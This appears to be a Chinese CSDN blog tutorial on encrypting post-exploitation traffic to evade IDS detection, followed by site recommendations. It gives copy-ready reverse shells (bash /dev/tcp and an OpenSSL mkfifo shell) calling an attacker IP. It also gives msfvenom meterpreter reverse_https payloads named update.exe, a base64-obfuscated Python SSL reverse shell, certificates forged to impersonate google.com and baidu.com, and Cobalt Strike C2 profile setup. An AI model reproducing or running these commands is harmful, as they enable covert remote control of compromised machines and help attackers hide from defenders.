后渗透流量加密

已于 2022-04-07 12:33:57 修改
阅读量4.6k 收藏 3
点赞数 1
分类专栏: 小计 文章标签: 安全 https 网络 渗透测试
于 2022-02-14 13:40:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45161658/article/details/122922762
版权

🌕写在前面

  • 🍊博客主页:Scorpio_m7github
  • 🎉欢迎关注🔎点赞👍收藏⭐️留言📝
  • 🌟本文由 Scorpio_m7原创,CSDN首发!
  • 📆首发时间:🌹2022年2月14日🌹
  • ✉️坚持和努力一定能换来诗与远方!
  • 🙏作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢!

文章目录

前言

当攻击方在后渗透阶段需要进行横向渗透时,通常需要反弹shell,如果咱们反弹shell都是明文传输的话,内网的IDS等安全设备会对流量进行分析,检测到有恶意行为,防守方会通过安全设备对攻击流量进行溯源分析,攻击行为就会暴露,因此需要对流量进行加密。

未加密

在未进行加密的情况下,通过wireshark 抓包可以直接查看输入的命令与返回内容。这些会被IDS/IPS等安全设备检测到,需要进行加密混淆。

  • 攻击机执行nc -lvp 8765
  • 目标机执行bash -i >& /dev/tcp/192.168.211.129/8765 0>&1

Wireshark 抓到一系列数据包,随便追踪一个的TCP流,未加密的情况下,攻击机与目标机之间的通信都是明文传输的,所以流量设备可以很容易查看到攻击者的行为记录。

OpenSSL

在计算机网络上,OpenSSL是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上。

SSL能使用户/服务器应用之间的通信不被攻击者窃听,并且始终对服务器进行认证,还可选择对用户进行认证。SSL协议要求建立在可靠的传输层协议(TCP)之上。SSL协议的优势在于它是与应用层协议独立无关的,高层的应用层协议(例如:HTTP,FTP,TELNET等)能透明地建立于SSL协议之上。SSL协议在应用层协议通信之前就已经完成加密算法、通信密钥的协商及服务器认证工作。在此之后应用层协议所传送的数据都会被加密,从而保证通信的私密性。

netcat流量加密

攻击机使用OpenSSL生成自签名证书。生成自签名证书时会提示输入证书信息,如果懒得填写可以一路回车即可。成功生成后,会有key.pem和cert.pem加密文件。

root@kali:~/桌面# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Generating a RSA private key
...................++++
...............................................++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:

在攻击机上使用 OpenSSL 监听端口。此时 OpenSSL 便使用生成的密钥文件在攻击机的 8766 端口上启动了一个 SSL/TLS server

root@kali:~/桌面# openssl s_server -quiet -key key.pem -cert cert.pem -port 8766

在目标机上执行反弹shell命令

giantbranch@ubuntu:~$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.211.129:8766 > /tmp/s; rm /tmp/s

攻击机成功接受到返回的shell并执行命令。使用wireshark抓取两者通信的数据包查看,发现都是乱码,流量已经进行加密。

Metasploit流量加密

在使用MSF进行内网横向渗透时,由于该工具使用的广泛性,这些流量容易被内网里的流量审计工具检测识别,所以需要我们对它的流量进行加密。

OpenSSL创建证书

攻击机使用OpenSSL模拟google的SSL证书信息,可自己修改其他。生成后,会有www.google.com.pem加密文件。通过cat www.google.com.pem查看私钥和证书

root@kali:~/桌面# openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \-keyout www.google.com.key \-out www.google.com.crt && \cat www.google.com.key www.google.com.crt > www.google.com.pem && \rm -f www.google.com.key www.google.com.crt
Generating a RSA private key
...............................................++++
..........................++++
writing new private key to 'www.google.com.key'
-----

创建完证书后,我们可以通过MSF创建HTTP或HTTPS类型的有效负载,并为其提供pem格式的证书以用于验证连接。此处可以结合免杀等其他免杀手段。生成后,会有update.exe恶意文件。

root@kali:~/桌面# msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.211.129 LPORT=4444 PayloadUUIDTracking=true PayloadUUIDName=Whoamishell HandlerSSLCert=/root/桌面/www.google.com.pem StagerVerifySSLCert=true -f exe -o /root/桌面/update.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 514 bytes
Final size of exe file: 73802 bytes
Saved as: /root/桌面/update.exe

- HandlerSSLCert:向处理程序通知所使用的PEM证书。

- StagerVerifySSLCert:当收到一个连接时执行SSL证书验证。

- PayloadUUIDTracking和PayloadUUIDName:可以在监听的时候过滤掉不需要的回连请求。

也可以生成psh类型的木马。生成后,会有shell.bat恶意文件。shell.bat通过运行powersell来获得session。

root@kali:~/桌面# msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.211.129 LPORT=4444 PayloadUUIDTracking=true HandlerSSLCert=/root/桌面/www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o /root/桌面/shell.bat
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 585 bytes
Final size of psh-cmd file: 7959 bytes
Saved as: /root/桌面/shell.bat

攻击机启动监听。HandlerSSLCert是为了通知处理程序它将使用的证书,StagerVerifySSLCert是为了在接收到连接时执行SSL 证书验证。通过show advanced查看HandlerSSLCert是否调用了openssl创建的证书以及StagerVerifySSLCert是否开启。

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST 192.168.211.129
LHOST => 192.168.211.129
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set HandlerSSLCert /root/桌面/www.google.com.pem
HandlerSSLCert => /root/桌面/www.google.com.pem
msf6 exploit(multi/handler) > set StagerVerifySSLCert true
StagerVerifySSLCert => true
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.211.129:4444

将生成好的update.exe或者shell.bat上传到目标主机,并执行得到目标主机的meterpreter。在目标主机通过wireshark抓取数据包发现,流量已经进行加密。

impersonate_ssl模块

Metasploit框架内置 auxiliary/gather/impersonate_ssl 模块,可用来自动从信任源创建一个虚假证书。执行完命令会在/root/.msf4/loot/下自动生成可信度高的PEM证书,重复上面的步骤使用该证书即可。

msf6 > use auxiliary/gather/impersonate_ssl 
msf6 auxiliary(gather/impersonate_ssl) > set RHOST www.baidu.com
RHOST => www.baidu.com
msf6 auxiliary(gather/impersonate_ssl) > run

使用python模块进行加密

通过MSF生成python可执行的payload。默认生成的是python2的脚本。

root@kali:~/.msf4/loot# msfvenom -p cmd/unix/reverse_python_ssl lhost=192.168.211.129 lport=4444
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 629 bytes
python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE5Mi4xNjguMjExLjEyOScsNDQ0NCkpCnM9c3NsLndyYXBfc29ja2V0KHNvKQpOej1GYWxzZQp3aGlsZSBub3QgTno6CglkYXRhPXMucmVjdigxMDI0KQoJaWYgbGVuKGRhdGEpPT0wOgoJCU56ID0gVHJ1ZQoJcHJvYz1zdWJwcm9jZXNzLlBvcGVuKGRhdGEsc2hlbGw9VHJ1ZSxzdGRvdXQ9c3VicHJvY2Vzcy5QSVBFLHN0ZGVycj1zdWJwcm9jZXNzLlBJUEUsc3RkaW49c3VicHJvY2Vzcy5QSVBFKQoJc3Rkb3V0X3ZhbHVlPXByb2Muc3Rkb3V0LnJlYWQoKSArIHByb2Muc3RkZXJyLnJlYWQoKQoJcy5zZW5kKHN0ZG91dF92YWx1ZSkK')[0]))"

攻击机执行以下命令开启监听:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload cmd/unix/reverse_python_ssl
payload => cmd/unix/reverse_python_ssl
msf6 exploit(multi/handler) > set lhost 192.168.211.129
lhost => 192.168.211.129
msf6 exploit(multi/handler) > run
[*] Started reverse SSL handler on 192.168.211.129:4444

接下来目标主机使用msf执行生成的payload。因为python 可以使用 -c 参数加载任意代码,我们就直接在代码中使用ssl库加密流量即可。

C:\Users\root\IDA_Pro_v7.0_Portable\python27>python.exe -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE5Mi4xNjguMjExLjEyOScsNDQ0NCkpCnM9c3NsLndyYXBfc29ja2V0KHNvKQpOej1GYWxzZQp3aGlsZSBub3QgTno6CglkYXRhPXMucmVjdigxMDI0KQoJaWYgbGVuKGRhdGEpPT0wOgoJCU56ID0gVHJ1ZQoJcHJvYz1zdWJwcm9jZXNzLlBvcGVuKGRhdGEsc2hlbGw9VHJ1ZSxzdGRvdXQ9c3VicHJvY2Vzcy5QSVBFLHN0ZGVycj1zdWJwcm9jZXNzLlBJUEUsc3RkaW49c3VicHJvY2Vzcy5QSVBFKQoJc3Rkb3V0X3ZhbHVlPXByb2Muc3Rkb3V0LnJlYWQoKSArIHByb2Muc3RkZXJyLnJlYWQoKQoJcy5zZW5kKHN0ZG91dF92YWx1ZSkK')[0]))"

成功获取到shell,且经过加密。

msf6 exploit(multi/handler) > run
[*] Started reverse SSL handler on 192.168.211.129:4444 
[*] Command shell session 1 opened (192.168.211.129:4444 -> 192.168.211.140:49569) at 2022-02-12 22:35:17 +0800

whoami
root-pc\root

Cobalt Strike流量加密

Cobalt Strike 是很多红队的首选的攻击神器,应用范围广泛,导致很多IDS入侵检测工具和流量检测工具已经可以拦截和发现,特别是流量方面,如果使用默认证书进行渗透和测试,很容易被流量检测出来并进行拦截,一旦被安全人员发现就会进行修复。我们生成证书修改C2 profile 加密混淆,实际上就是对流量加密传输,目的为了逃逸流量安全审计。

去除证书特征

cobalt strike默认使用的cobaltstrike.store 证书会被检测 。利用keytool工具生成一个证书。

root@kali:~/桌面/cobaltstrike4.3# keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias baidu.com -dname "CN=US, OU="baidu.com", O="Sofatest", L=Beijing, ST=Cyberspace, C=CN"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

成功生成了一个名为cobaltstrike.store的证书,将其放到 Cobalt Strike 目录里。使用命令查看证书情况,默认密码123456。

root@kali:~/桌面/cobaltstrike4.3# keytool -list -v -keystore cobaltstrike.store
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
输入密钥库口令:  
密钥库类型: PKCS12
密钥库提供方: SUN
您的密钥库包含 1 个条目
别名: baidu.com
创建日期: 2022年2月13日
条目类型: PrivateKeyEntry
证书链长度: 1
证书[1]:
所有者: CN=US, OU=baidu.com, O=Sofatest, L=Beijing, ST=Cyberspace, C=CN
发布者: CN=US, OU=baidu.com, O=Sofatest, L=Beijing, ST=Cyberspace, C=CN
序列号: 6eb54229
生效时间: Sun Feb 13 23:04:01 CST 2022, 失效时间: Sat May 14 23:04:01 CST 2022
证书指纹:
	 SHA1: 68:11:27:4F:CF:07:64:39:A3:F5:2B:12:BA:EA:A4:10:8D:57:7D:9D
	 SHA256: B2:62:43:AB:C3:CB:3E:57:C3:5A:C5:E4:47:56:45:91:88:46:28:B1:6C:37:FD:F1:80:ED:FF:B8:84:26:5F:F4
签名算法名称: SHA256withRSA
主体公共密钥算法: 2048 位 RSA 密钥
版本: 3
扩展: 
#1: ObjectId: 2.5.29.14 Criticality=false
SubjectKeyIdentifier [
KeyIdentifier [
0000: 0C BE 67 59 34 6F 03 D5   7C 50 60 F9 D2 AC FB 9A  ..gY4o...P`.....
0010: 24 1A 4D F5                                        $.M.
]
]

修改 C2-profile 文件

C2-profile 文件是 Cobalt Strike 内置工具,用于控制 Cobalt Strike 流量,可以防止安全设备对流量特征进行监控和拦截。

下载对应cs版本的profile文件,进行修改。主要需要修改的是https-certificate和code-signer两处地方,对应cobaltstrike.store文件中的信息。

##设置证书,注意以下内容得和生成的cobaltstrike.store证书一样
https-certificate {
	set keystore "../cobaltstrike.store";
    set password "123456";
    #set C   "CN";
    #set CN  "US";
    #set O   "Sofatest";
    #set OU  "baidu.com";
	#set L  "Beijing";
	#set ST  "Cyberspace";
    #set validity "365";
}

然后利用 Cobalt Strike 的 c2lint 来检测profile是否存在问题

root@NC:/mnt/f/cobaltstrike/cobaltstrike4.3# ./c2lint ./malleable-c2-master/jquery-c2.4.3.profile 
[+] POST 3x check passed
[+] .http-get.server.output size is good
[+] .http-get.client size is good
[+] .http-post.client size is good
[+] .http-get.client.metadata transform+mangle+recover passed (1 byte[s])
[+] .http-get.client.metadata transform+mangle+recover passed (100 byte[s])
[+] .http-get.client.metadata transform+mangle+recover passed (128 byte[s])
[+] .http-get.client.metadata transform+mangle+recover passed (256 byte[s])
[+] .http-get.server.output transform+mangle+recover passed (0 byte[s])
[+] .http-get.server.output transform+mangle+recover passed (1 byte[s])
[+] .http-get.server.output transform+mangle+recover passed (48248 byte[s])
[+] .http-get.server.output transform+mangle+recover passed (1048576 byte[s])
[+] .http-post.client.id transform+mangle+recover passed (4 byte[s])
[+] .http-post.client.output transform+mangle+recover passed (0 byte[s])
[+] .http-post.client.output transform+mangle+recover passed (1 byte[s])
[+] .http-post.client.output POSTs results
[+] .http-post.client.output transform+mangle+recover passed (48248 byte[s])
[+] .http-post.client.output transform+mangle+recover passed (1048576 byte[s])
[+] Beacon profile specifies an HTTP Cookie header. Will tell WinINet to allow this.
[%] [OPSEC] .host_stage is true. Your Beacon payload is available to anyone that connects to your server to request it. Are you OK with this? 
[!] .code-signer.keystore is missing. Will not sign executables and DLLs
[+] Found SSL certificate keystore
[!] .https-certificate.password is the default '123456'. Is this really your keystore password?

配置teamserver上线

修改teamserver默认端口-Dcobaltstrike.server_port=49949后运行。

root@NC:/mnt/f/cobaltstrike/cobaltstrike4.3# ./teamserver 172.26.210.212 123456 ./malleable-c2-master/jquery-c2.4.3.profile

启动 Cobalt Strike连接teamserver后,利用HTTPS进行监听,创建scripted web delivery脚本,发现可以使用ssl证书功能。生产的powershell命令到目标主机执行,成功上线。通过wireshark捕捉到的tcp流量是经过加密传输的乱码形态

Scorpio-m7
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
提权——Windows 本地漏洞提权
z1756227332的博客
03-12 1071
当我们获得webshell 想要进行创建用户等操作的时候会发现自己的权限不够,这个时候我们就需要进行提权的操作 提权主要包含这几种方式 1.数据库提权 2.本地溢出漏洞提权 3.第三方软件提权 我们来演示一下 利用MSF来进行本地漏洞的提权操作。 1.通过msf生成反弹shll进行执行反弹shll的操作 进入到kalis使用这条命令 来生成一个反弹shell 的.exe程序。 msfvenom -...
pyMalleableC2:适用于Cobalt Strike Malleable C2配置文件的Python解释器。 允许您以编程方式解析,构建和修改它们
04-29
pyMalleableC2 用于Cobalt Strike Malleable C2配置文件的Python解释器,可让您以编程方式解析,修改,构建它们并验证语法。 从Cobalt Strike版本4.3开始,支持所有Cobalt Strike可锻C2配置文件语法。 与以前的Cobalt Strike版本不向后兼容。 pyMalleableC2和这种性质的其他项目之间有什么区别? 使用使用解析配置文件。 与用户定义的正则表达式,模板引擎或类似方法相比,此方法要健壮得多。 将配置文件转换为 ,然后可以将其重构回源代码。 由于上述原因,pyMalleableC2允许您以编程方式构建配置文件或即时修改配置文件。 允许您验证可锻C2配置文件的语法(不执行运行时检查,请参见下面的警告。) 它具有许多if语句形式的AI。 赞助商 目录 :police_car_light: 警告! 没有运行时检查(但!) :police_car_light: 作者
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 8448
Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
网络安全进阶篇之流量加密(十三章-3)CS生成ssl证书修改c2 profile 加密流量逃逸检测
划水的小白白
05-19 3462
文章目录零、为什么要对CS进行流量加密一、 生成免费的 ssl 证书二、 创建并修改 C2-profile 文件三、 检测 C2 profile 文件是否可用四、 配置 teamserver 文件运行上线五、 抓取流量 零、为什么要对CS进行流量加密 cobalt strike 是很多红队的首选的攻击神器,在 APT 方面近几年应用范围很广, 很多著名的团队都曾使用这个工具进行 APT,效果显著。 导致很多 ids 入侵检测工具和流量检测工具已经可以拦截和发现, 特别是流量方面,如果使用默认证书进行渗
流量加密小结
RestoreJustice的博客
09-17 289
在红队进行渗透测试的后续渗透阶段为了扩大战果,往往需要进行横行渗透,所以需要拿到shell建立与目标之间的通信,当目标主机网络环境存在网络防御检测系统时(IDS、IPS等),如果攻击机与目标间通信的流量是明文传输,那么网络防御检测系统会检测出通信内容中带有的攻击特征,并对当前通信进行告警和阻止
知识领域: 网络安全 技术关键词: 漏洞分析、渗透测试加密算法 内容关键词: 攻击防范、网络流量分析、身份验证
最新发布
05-05
技术关键词: 漏洞分析、渗透测试加密算法 内容关键词: 攻击防范、网络流量分析、身份验证 用途: 学习保护信息系统免受恶意攻击和数据泄露 资源描述: OWASP (Open Web Application Security Project) 提供了广泛的...
知识领域: 网络安全 技术关键词: 漏洞分析、渗透测试加密算法 内容关键词: 攻击防范、身份验证、网络流量分析
04-18
技术关键词: 漏洞分析、渗透测试加密算法 内容关键词: 攻击防范、身份验证、网络流量分析 用途: 学习保护信息系统免受恶意攻击和数据泄露 资源描述: "OWASP官方网站"提供了全面的网络安全知识和工具,包括常见漏洞...
知识领域: 网络安全 技术关键词: 漏洞分析、渗透测试加密算法 内容关键词: 攻击防范、网络流量分析、身份验证 用途: 学习保
04-18
技术关键词: 漏洞分析、渗透测试加密算法 内容关键词: 攻击防范、网络流量分析、身份验证 用途: 学习保护信息系统免受恶意攻击和数据泄露 资源描述: Cybrary 提供了免费的网络安全课程,覆盖了从基础到高级的各种...
k0otkit:针对K8s集群的通用后渗透控制技术.pdf
08-11
4. **持久化控制**:在v0.3中,使用Meterpreter替代bash shell,并实现流量加密和自动重连功能。 5. **优化payload传输**:在v0.4版本中,k0otkit不再创建文件,而是从标准输入读取YAML数据,将Payload隐藏在环境...
Cobalt Strike(十六)malleable C2的使用
qq_56426046的博客
09-26 762
英文 Malleable Command and Control可扩展的命令和控制Mallerable C2 是一种特定的语言,主要用来控制 “Cobalt Strike Beacon”攻击载荷中的网络指针(网络参数)使用malleable C2。
c2profilejs:用于为Cobalt Strike创建C2配置文件的Web UI
05-14
C2配置文件JS :construction: :construction:正在施工:construction: :construction: 我正在更新UI的外观,因此一些组件未设置样式,但是所有功能仍然存在。 关于 C2 Profile JS是一个Web应用程序,旨在简化植入工具的C2配置文件的生成。 C2配置文件并不太复杂,但是当红色团队需要即时适应BLUEFOR时,时间是至关重要的因素。 C2配置文件JS可以缩短C2配置文件的周转时间,并减少出错的机会。 依存关系 发展 Nodejs的 Java 生产 码头工人 如何 最好通过docker容器hattmo / c2profilejs使用C2配置文件。 docker run --rm -d -p 3000:80 --name c2profilejs hattmo/c2profilejs:latest 然后导航到开始使用该工具。 可以使用以下命令从源代码构建和运行C2 Profile JS npm install npm run
20202411 2022-2023-2 《网络与系统攻防技术》实验三实验报告
01学得好,从入门到吃饱
03-29 264
ARM大冤种安装不了veil-evasion,最后用最笨的办法实现百分百免杀
如何使用C2concealer生成随机化的C2 Malleable配置文件
ALLEN'Blog
03-01 411
dns.py (自定义DNS子域名)file_type_prepend.py (自定义http-get-server请求格式,即C2控制指令)params.py (包含常见参数名和通用字典的两个字典)reg_headers.py (常见HTTP Header,类似user-agent和server)smb.py (SMB管道命名)stage.py (跟IoC相关的stager数据)transform.py (Payload数据转换)
流量加密技术
课嗨教育的专栏
09-09 1298
目录 一、使用 Openssl 反弹加密 shell ​ 二、MSF 流量加密躲避检测 一、使用 Openssl 反弹加密 shell 红队进行渗透测试的后续渗透阶段为了扩大战果,往往需要横行渗透,往往 需要反弹 shell,如果反弹 shell 都是明文传输,那么内网里有 IDS 或者防护软件 会进行流量进行分析,检测带有攻击特征,很快被发现,如果蓝队对攻击流量回 溯分析,就可以复现攻击的过程。此时红队攻击就会暴漏出来,整个项目都要停 止。 使用 wireshark 抓包直接
隐藏你的C2(使用域前置技术隐藏C2服务器,以及使用iptables策略来保护服务器)
Love&Share
12-17 2954
本文将会介绍使用域前置技术隐藏C2服务器,以及使用iptables策略来保护服务器
红队作业 | MSF源码级别免杀实录
Ms08067安全实验室
11-24 1410
文章来源|MS08067 红队培训班 第4期本文作者:学员A(红队培训班4期学员)按老师要求尝试完成布置的作业如下:对于msf生成的shellcode都是一样的。所以从代码层面来讲来说,不...
红队隧道加密之MSF流量加密(二)
xf555er的博客
11-26 2011
如今大多数企业的内网都部署了流量审计服务, 用来专门分析流量特征, 比如后门特征和行为特征若直接使用Metasploit对内网进行横向渗透, 其产生的流量会很容易被内网防护工具检测出来, 因此需对流量进行加密来绕过检测这里介绍使用OpenSSL对MSF流量进行加密
Netty搭建Http2服务端并支持TLS传输加密
Brucelwl的博客
12-11 2075
Netty搭建Http2服务端并支持TLS传输加密
代码签名 signcode.exe authencode
buptisc_txy的专栏
05-20 5992
  签名常用的四个软件makecert,cert2spc,signcode,chktrust 微软提供了专用的文件签名工具(Signcode.exe)。运行Signcode.exe 后,进入代码数字签名向导界面,按照界面提示即可完成数字签名。我们可以使用Windows命令程序chktrust.exe来查验已经签名的代码信息。对经过合法数字签名后的代码进行验证,其提示信息包括软件
Kali Linux:渗透测试工具大全
- **SSLsplit**:用于中间人攻击,记录和解密加密HTTPS流量。 4. **欺骗与嗅探**: - **Burp Suite**:Web应用程序安全测试工具。 - **DNSChef**:可配置的DNS代理,用于网络欺骗。 - **responder**:多协议...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Scorpio-m7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值